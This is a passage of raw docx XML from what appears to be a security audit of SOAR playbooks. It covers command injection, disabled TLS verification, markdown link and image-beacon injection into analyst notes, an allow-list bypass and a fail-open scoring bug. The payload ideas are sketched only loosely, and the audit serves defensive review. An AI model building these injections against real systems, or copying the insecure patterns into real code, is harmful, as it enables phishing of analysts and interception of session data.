        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: validate hostname against </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>[A-Za-z0-9._-]+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> before use; single-quote the value in the PowerShell path.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-78 OS Command Injection (2024 CWE Top 25 #7); CWE-73. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A03:2021 Injection. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1059.001 Command and Scripting Interpreter: PowerShell. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR playbooks / Input Validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB2-11 — TLS certificate verification disabled on SOAR REST calls (verify=False)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 3.7). Exploitability: Not exploitable on loopback (defence-in-depth).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/risk_notable_import_data.py:416; risk_notable_merge_events.py:421,620,971; risk_notable_protect_assets_and_users.py:445; risk_notable_review_indicators.py:91; risk_notable_verdict.py:35; start_investigation.py:35,185,188,197</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>risk_notable_protect_assets_and_users.py:445</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>risk_notable_review_indicators.py:91</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>risk_notable_verdict.py:35</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>start_investigation.py:35,185,188,197</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Code excerpt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>phantom.requests.get(url, verify=False).json()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t>: All internal SOAR REST calls (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>build_phantom_rest_url(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) disable certificate validation. Although these target the local SOAR node, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>verify=False</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a systemic anti-pattern: it suppresses MITM protection and, if the base URL is ever reconfigured to a remote/clustered endpoint, exposes session tokens and event data. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>import_data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> also parses the untrusted JSON returned over that unverified channel. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: localhost; Verdict: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Not exploitable in the default single-node deployment (defence-in-depth only).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: rely on the platform's REST helper with verification, or pin the internal CA: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>phantom.requests.get(url, verify="/opt/phantom/etc/cassl.pem")</w:t>
      </w:r>
      <w:r>
        <w:t>. At minimum, centralise so the flag can be toggled for clustered deployments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-295 Improper Certificate Validation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A07:2021 Identification and Authentication Failures, A02:2021 Cryptographic Failures. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1557 Adversary-in-the-Middle. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SC-8 Transmission Confidentiality and Integrity. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.DS Protect - Data Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.24 Use of cryptography. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR playbooks / Communication Security.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB1-10 — Attacker-controlled values rendered unescaped into SOAR markdown notes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 3.5). Exploitability: Conditionally exploitable (stored formatting/link injection).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/CiscoTalosIntelligence_Identifier_Reputation_Analysis.py:259,295,331; CrowdStrike_OAuth_API_Identifier_Activity_Analysis.py:171,203; Splunk_Attack_Analyzer_Dynamic_Analysis.py:1074,1077,1117,1120; G_Suite_for_GMail_Message_Identifier_Activity_Analysis.py:116</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: These blocks splice attacker-influenced strings (threat category text, URL, file name, e-mail subject/sender) into markdown that is written to container notes / workbook tasks with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>phantom.format</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>phantom.add_note</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>workbook_task_update</w:t>
      </w:r>
      <w:r>
        <w:t>. Markdown control characters (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> breaks table columns, `</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> `</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> break out of a code span or a </w:t>
      </w:r>
      <w:r>
        <w:t>[text](url)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> link, </w:t>
      </w:r>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> start headings/images) are not escaped, so a crafted value can corrupt the analyst's note or inject a markdown link/image rendered in the SOAR UI (limited stored-content injection). SOAR renders markdown, not raw HTML, so this is formatting/UX injection rather than classic XSS, but a malicious </w:t>
      </w:r>
      <w:r>
        <w:t>](javascript:..)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">-style link or an off-platform image beacon in </w:t>
      </w:r>
      <w:r>
        <w:t>![](..)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> is plausible in </w:t>
      </w:r>
      <w:r>
        <w:t>Splunk_Attack_Analyzer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> where the URL itself is the attacker's. **Untrusted-input reachability**: indicator/e-mail fields -&gt; </w:t>
      </w:r>
      <w:r>
        <w:t>phantom.format</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> template -&gt; note. **Verdict: Conditionally exploitable** (stored formatting/link injection; requires an analyst to view/click, and depends on the SOAR markdown renderer's link policy). **Remediation**: reuse the </w:t>
      </w:r>
      <w:r>
        <w:t>markdown_escape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> helper already present in </w:t>
      </w:r>
      <w:r>
        <w:t>Jira_Related_Tickets_Search.py:224-237</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:t>ServiceNow_Related_Tickets_Search.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> for every untrusted value placed in a note, and for </w:t>
      </w:r>
      <w:r>
        <w:t>Splunk_Attack_Analyzer` render the URL/file name inside a fenced code span rather than a heading/image alt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-79 Improper Neutralization of Input During Web Page Generation (Cross-site Scripting) (2024 CWE Top 25 #1); CWE-116 Improper Encoding or Escaping of Output. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A03:2021 Injection. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1566 Phishing. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR playbooks / Output Encoding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB2-12 — Allow-list bypass by self-tagging in aws_disable_user_accounts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 3.5). Exploitability: Conditionally exploitable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/aws_disable_user_accounts.py:19-46,131-156</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>indicator_tag_4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The playbook checks </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aws_username in custom_list:aws_inactive_user_allowlist</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and, for allow-listed users, tags them </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aws_inactive_user_allowlist</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The allow-list is a mutable custom list; the check is string-membership only. If an attacker can influence which usernames flow in (or the list content), the gate is bypassable, and conversely a legitimate admin *not* on the list is disabled after a single analyst </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Yes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The prompt is a good control; the allow-list is the weak part. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>playbook_input:aws_username</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ← </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aws_find_inactive_users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → artifact </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>awsUserName</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Verdict: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Conditionally exploitable / defence-in-depth.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t>: treat the allow-list as authoritative protection for break-glass/root and service accounts, validate usernames against IAM before acting, and require the prompt to echo the full list of accounts being disabled (it does) plus their last-used date and group memberships so the analyst can catch an admin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-183; CWE-285 Improper Authorization. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A01:2021 Broken Access Control. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1531 Account Access Removal. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AC-6 Least Privilege, AC-3 Access Enforcement. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.AA Protect - Identity Management, Authentication, and Access Control. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.2 Privileged access rights. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR playbooks / Access Control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB1-09 — CrowdStrike Dynamic Analysis URL scoring is dead code or crash-prone (wrong datapaths, zip order)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 3.1). Exploitability: Correctness / fail-open (PoC executed).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/CrowdStrike_OAuth_API_Dynamic_Analysis.py:136,204,211,587</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>normalized_url_detonation_output</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> collects from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>filtered-data:...:crowdstrike_url_detonation:...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, but the detonation action is named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>url_detonation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, so the datapaths resolve to nothing and the block silently produces empty scores. If the names were corrected, the subsequent </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>zip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> passes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>verdict_list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> into the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>_score</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> slot and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>threat_score_list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> into </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>_verdict</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, then does </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>round(list(set(verdict_list))[0] / 10)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - dividing a verdict string by 10. The file-report </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>format</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> references </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>windows_sandbox_filter:condition_1:windows_file_detonation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> which does not exist in this playbook. Net effect: URL detonation verdicts are not scored (fail-open to "no reputation") and the block can raise </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>TypeError</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on real data. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: verdicts describe an attacker-submitted URL; the bug degrades the verdict rather than being driven by a payload. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Not exploitable as code-exec; it is a correctness/fail-open defect</w:t>
      </w:r>
      <w:r>
